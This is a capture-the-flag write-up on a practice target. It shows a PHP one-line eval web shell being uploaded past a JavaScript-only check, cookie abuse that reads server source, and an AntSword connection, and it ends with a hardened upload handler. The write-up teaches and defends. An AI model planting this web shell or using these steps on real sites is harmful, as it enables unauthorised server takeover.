Background
Catching up on practice-range targets I had neglected.
Process
When opened, it looks like this:

The hint is already obvious: find the admin backend, upload a shell, and obtain the key in the website's root directory.
Discovering the Upload Point
Let's start by scanning for the backend using dirsearch:
```
python dirsearch.py -u xxx.xxx.xxx.xxx:yyy -e asp,php -x 400,403,404,500,503,514,564 -F -t 300 --random-agents --http-method head
```

Hmm, everything is under the admin directory. Accessing the admin page alone shows a blank page, so let's add upload.php:

It redirects to upload1.php first, with a pop-up showing no permission to upload, then redirects to upload2.php:
As a former CTF newbie, my intuition tells me that there is a problem with upload1.php, so let's intercept it with Burp:

Hmm, in the returned page we can clearly see a form. Since the page was hidden behind a pop-up, the first thing to suspect is front-end JavaScript.
Disable JavaScript in the browser, re-access upload.php, and after the redirect to upload1.php the upload box is displayed:

Let's just go for it and upload a test.php with the following content:
```php
<?php @eval($_POST['aa']);?>
```

Upload successful, redirected to upload_file.php. Yeah! Wait a minute, where's the path?
Obtaining the Upload Path
Getting a bit impulsive there. Let's intercept the upload request of upload1.php again using Burp:

Hmm, everything seems normal, but after uploading, it doesn't provide the path. Let's take a closer look at the validation cookie:
```
Cookie:uploadmd5=verify%2F266c9bd3c1cd6c9e.txt;
```
This validation string 266c9bd3c1cd6c9e is generally useful. Since the upload redirects to upload_file.php, the code that generates the path for the uploaded shell must be in the upload_file.php file.
Let's try changing the value of uploadmd5 to upload_file.php and see if we can read the source code (it's like an arbitrary file read vulnerability):

OHHHHHHH, we have successfully read the source code of the upload:
```php
<?php
$path="uploadfile/";//Upload path
$verify=$_POST["verify"];
$time=date("Ymd");
if($_FILES["filename"]["name"])
{
    $file1=$_FILES["filename"]["name"];
    $file2 = $path.$time.'_'.$verify.'_'.$file1;
    $flag=1;
}
if($flag) $result=move_uploaded_file($_FILES["filename"]["tmp_name"],$file2);
if($result) echo "Upload successful!";
?>
```
The statement that constructs the upload file path has also been found: `$path.$time.'_'.$verify.'_'.$file1`
That is: upload directory, then date("Ymd"), an underscore, the value of verify, an underscore, and the file name.
So the path of the uploaded file should be: admin/uploadfile/20200331_266c9bd3c1cd6c9e_test.php
Result
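A hardened counterpart to the upload_file.php handler and the uploadmd5 cookie handling above, as an added example rather than code from the challenge. The session flag, storage directory, allowlist and size limit are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not the challenge's code. Assumed: $_SESSION['is_admin'], UPLOAD_DIR, ALLOWED, MAX_BYTES.
session_start();

const UPLOAD_DIR = '/var/www/private_uploads'; // assumed: outside the web root
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'application/pdf' => 'pdf'];

function reject(int $status, string $message): void
{
    http_response_code($status);
    exit($message);
}

// Accept only the exact shape of the token name seen in the cookie; a value such as
// "upload_file.php" or one containing "../" never reaches a file function.
function is_valid_verify_name($value): bool
{
    return is_string($value) && preg_match('#\Averify/[0-9a-f]{16}\.txt\z#', $value) === 1;
}

// 1. Authorization is enforced on the server, not by a JavaScript pop-up.
if (empty($_SESSION['is_admin'])) {
    reject(403, 'Forbidden');
}
if (!is_valid_verify_name($_COOKIE['uploadmd5'] ?? '')) {
    reject(400, 'Bad verify token');
}

// 2. The upload must have completed cleanly and be within the size limit.
$file = $_FILES['filename'] ?? null;
if (!is_array($file) || $file['error'] !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES) {
    reject(400, 'Upload failed');
}

// 3. Decide the type from the file's content, not from its client-supplied name.
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
$ext  = is_string($mime) ? (ALLOWED[$mime] ?? null) : null;
if ($ext === null) {
    reject(415, 'File type not allowed');
}

// 4. The stored name is generated server-side; neither verify nor the file name is in the path.
$target = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($file['tmp_name'], $target)) {
    reject(500, 'Could not store file');
}
echo 'Upload successful!';
```

Because the stored name is random and the directory is outside the web root, an uploaded file can neither be located from request values nor executed by requesting it.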
AntSword connection:

Successfully obtained the flag:
